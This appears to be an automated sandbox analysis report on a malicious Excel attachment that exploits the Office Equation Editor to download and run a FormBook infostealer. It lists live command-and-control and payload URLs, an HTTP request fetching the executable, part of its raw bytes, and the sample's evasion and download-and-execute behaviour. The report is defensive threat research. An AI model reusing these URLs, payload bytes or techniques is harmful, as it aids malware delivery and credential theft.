Windows Analysis Report
TedarikciSiparisi_83613 .xlsx

Overview

General Information

Sample Name: TedarikciSiparisi_83613 .xlsx
Analysis ID: 626598
MD5: 650bb8e5fe570bde782be21c4e9f421c
SHA1: fd3ffa031546f1dfa7ed884689ca1e85941fca1e
SHA256: 247838308fb5e12a258def82a63e3a752d1536d1771539d63cebcf283b8154b5
Tags: VelvetSweatshop, xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Shellcode detected
Office equation editor drops PE file
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Office equation editor establishes network connection
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Office Equation Editor has been started
Contains functionality to download and launch executables
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection

Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.mentalnayaarifmetika.online/ocgr/"], "decoy": ["shiftmedicalstaffing.agency", "muktobangla.xyz", "attmleather.com", "modelahs.com", "clime.email", "yonatec.com", "mftie.com", "doxofcolor.com", "american-atlantic.net", "christineenergy.com", "fjqsdz.com", "nagpurmandarin.com", "hofwimmer.com", "gororidev.com", "china-eros.com", "xn--ekrt15fxyb2t2c.xn--czru2d", "dabsavy.com", "buggy4t.com", "souplant.com", "insurancewineappraisals.com", "012skz.xyz", "kincsemto.net", "zyaxious.website", "tellgalpy.com", "demetbatmaz.com", "wallacehills.com", "chambaultfleurs.com", "fairfieldgroupfw.com", "lotsimprovements.com", "dhslcy.com", "anotherdegen.com", "dearpennyyouradviceblogspot.com", "seekbeforefind.com", "societyalluredmcc.com", "climatecheckin.com", "candybox-eru.com", "tentacionescharlie.com", "exceedrigging.online", "skb-cabinet.com", "qhzhuhang.com", "ccav11.xyz", "sandstonehosting.com", "14offresimportantes.com", "xn--hj2bz6fwvan2be1g5tb.com", "embedded-electronic.com", "drsanaclinic.com", "ageofcryptos.com", "dreamonetnpasumo1.xyz", "engroconnect.net", "huvao.com", "denalicanninglids.com", "tootko.com", "edisson-bd.com", "myamazonloan.net", "dbcyebnveoyu.cloud", "floridacaterpillar.com", "travisjbogard.com", "dialoneconstruction.com", "tubesing.com", "gofilmwizards.com", "tahnforest.com", "salahov.info", "bimcellerviss.com", "garglimited.com"]}
Source: TedarikciSiparisi_83613 .xlsx ReversingLabs: Detection: 34%
Source: Yara match File source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: http://180.214.238.224/__cloud_for_file/vbc.exe Avira URL Cloud: Label: malware
Source: www.mentalnayaarifmetika.online/ocgr/ Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe ReversingLabs: Detection: 41%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 41%
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Joe Sandbox ML: detected

Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Network connect: IP: 180.214.238.224 Port: 80
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: C:\Users\VICTOR\Downloads\Documents\CryptoObfuscator_Output\BMCXBMXCKSKS.pdb source: EQNEDT32.EXE, 00000002.00000003.953779390.000000000071E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, vbc.exe.2.dr, vbc[1].exe.2.dr
Source: Binary string: THEDEVILISHERE.pdb source: vbc.exe, 00000004.00000002.961584082.00000000004D0000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000004.00000002.961770763.00000000021E1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\VICTOR\Downloads\Documents\CryptoObfuscator_Output\BMCXBMXCKSKS.pdbBSJB source: EQNEDT32.EXE, 00000002.00000003.953779390.000000000071E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe.2.dr, vbc[1].exe.2.dr
Source: Binary string: THEDEVILISHERE.pdbXqnq `q_CorDllMainmscoree.dll source: vbc.exe, 00000004.00000002.961584082.00000000004D0000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000004.00000002.961770763.00000000021E1000.00000004.00000800.00020000.00000000.sdmp

Software Vulnerabilities

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036306A9 ShellExecuteExW,ExitProcess, 2_2_036306A9
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036305BD LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_036305BD
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036306C7 ExitProcess, 2_2_036306C7
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03630648 URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_03630648
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03630531 URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_03630531
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0363054D URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_0363054D
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03630692 ShellExecuteExW,ExitProcess, 2_2_03630692
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036305D7 URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_036305D7
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 180.214.238.224:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 63MB

Networking

Source: Malware configuration extractor URLs: www.mentalnayaarifmetika.online/ocgr/
Source: Joe Sandbox View ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK
Date: Sat, 14 May 2022 13:14:18 GMT
Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
Last-Modified: Fri, 13 May 2022 09:07:10 GMT
ETag: "38000-5dee0ffdad130"
Accept-Ranges: bytes
Content-Length: 229376
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ba 1f 7e 62 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 06 00 00 76 03 00 00 7c 03 00 00 00 00 00 ca 95 03 00 00 20 00 00 00 a0 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 03 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 70 95 03 00 57 00 00 00 00 c0 03 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 03 00 0c 00 00 00 18 50 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 75 03 00 00 20 00 00 00 76 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 03 00 00 02 00 00 00 78 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 c8 05 00 00 00 c0 03 00 00 06 00 00 00 7a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 95 03 00 00 00 00 00 48 00 00 00 02 00 05 00 9c 50 03 00 d4 44 00 00 03 00 02 00 03 00 00 06 08 
3d 00 00 10 13 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 00 28 0b 00 00 06 00 2a 00 00 00 03 30 09 00 07 00 00 00 00 00 00 00 02 28 3e 00 00 0a 2a 00 13 30 08 00 36 02 00 00 01 00 00 11 2b 07 26 16 28 11 00 00 06 1a 28 11 00 00 06 1e 28 11 00 00 06 3a e9 01 00 00 18 45 01 00 00 00 f6 ff ff ff 17 2d 06 d0 03 00 00 06 26 26 00 17 28 18 00 00 06 20 79 e7 07 00 28 18 00 00 06 25 26 20 7e e7 07 00 28 18 00 00 06 25 26 28 7f 00 00 06 20 81 e7 07 00 28 18 00 00 06 20 88 e7 07 00 28 18 00 00 06 28 80 00 00 06 20 8b e7 07 00 28 18 00 00 06 20 8e e7 07 00 28 18 00 00 06 28 80 00 00 06 20 91 e7 07 00 28 18 00 00 06 20 94 e7 07 00 28 18 00 00 06 25 26 28 80 00 00 06 20 97 e7 07 00 28 18 00 00 06 25 26 20 a0 e7 07 00 28 18 00 00 06 28 80 00 00 06 0a 1f 0c 28 11 00 00 06 28 06 00 00 06 3a 0d 01 00 00 1a 45 01 00 00 00 f6 ff ff ff 26 1f 10 28 11 00 00 06 1f 14 28 11 00 00 06 39 19 01 00 00 26 06 28 a4 00 00 06 0b 1f 18 28 11 00 00 06 28 05 0
Source: global traffic HTTP traffic detected: GET /__cloud_for_file/vbc.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 180.214.238.224
Connection: Keep-Alive
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036305BD LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_036305BD
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.238.224 (this line is repeated 50 times in the report)
Source: EQNEDT32.EXE, 00000002.00000002.956128878.00000000006B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000002.00000002.956128878.00000000006B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000002.00000002.956128878.00000000006B4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.953845845.00000000006F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://180.214.238.224/__cloud_for_file/vbc.exe
Source: EQNEDT32.EXE, 00000002.00000003.953845845.00000000006F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://180.214.238.224/__cloud_for_file/vbc.exe95C:
Source: EQNEDT32.EXE, 00000002.00000002.956128878.00000000006B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://180.214.238.224/__cloud_for_file/vbc.exeX
Source: EQNEDT32.EXE, 00000002.00000002.956107839.0000000000696000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://180.214.238.224/__cloud_for_file/vbc.exehhC:
Source: EQNEDT32.EXE, 00000002.00000002.956562108.0000000003630000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://180.214.238.224/__cloud_for_file/vbc.exej
Source: EQNEDT32.EXE, 00000002.00000003.953884228.000000000071C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://180.214.238.224/__cloud_for_file/vbc.exeu
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2DC1A5DE.emf

E-Banking Fraud

Source: Yara match File source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: 2.3.EQNEDT32.EXE.6cecd8.0.raw.unpack, type: UNPACKEDPE Matched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\Public\vbc.exe Code function: 4_2_003358D3 4_2_003358D3
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E24D0 4_2_002E24D0
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E5610 4_2_002E5610
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E0678 4_2_002E0678
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E1CE8 4_2_002E1CE8
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E1CE7 4_2_002E1CE7
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E65A0 4_2_002E65A0
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E0638 4_2_002E0638
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 77620000 page execute and read and write
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 77740000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 77620000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 77740000 page execute and read and write
Source: vbc.exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: TedarikciSiparisi_83613 .xlsx ReversingLabs: Detection: 34%
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$TedarikciSiparisi_83613 .xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR5F10.tmp
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@6/18@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: C:\Users\VICTOR\Downloads\Documents\CryptoObfuscator_Output\BMCXBMXCKSKS.pdb source: EQNEDT32.EXE, 00000002.00000003.953779390.000000000071E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, vbc.exe.2.dr, vbc[1].exe.2.dr
Source: Binary string: THEDEVILISHERE.pdb source: vbc.exe, 00000004.00000002.961584082.00000000004D0000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000004.00000002.961770763.00000000021E1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\VICTOR\Downloads\Documents\CryptoObfuscator_Output\BMCXBMXCKSKS.pdbBSJB source: EQNEDT32.EXE, 00000002.00000003.953779390.000000000071E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe.2.dr, vbc[1].exe.2.dr
Source: Binary string: THEDEVILISHERE.pdbXqnq `q_CorDllMainmscoree.dll source: vbc.exe, 00000004.00000002.961584082.00000000004D0000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000004.00000002.961770763.00000000021E1000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E3AC0 push esp; ret 4_2_002E3AC9
Source: initial sample Static PE information: section name: .text entropy: 7.92488075838

Boot Survival

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX (10 occurrences)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX (8 occurrences)
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX (16 occurrences)

Malware Analysis System Evasion

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2344 Thread sleep time: -300000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 1036 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE API call chain: ExitProcess graph end node
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE API call chain: ExitProcess graph end node
Source: EQNEDT32.EXE, 00000002.00000002.956335622.00000000006F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ??\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: EQNEDT32.EXE, 00000002.00000002.956117653.000000000069D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036306C7 mov edx, dword ptr fs:[00000030h] 2_2_036306C7
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY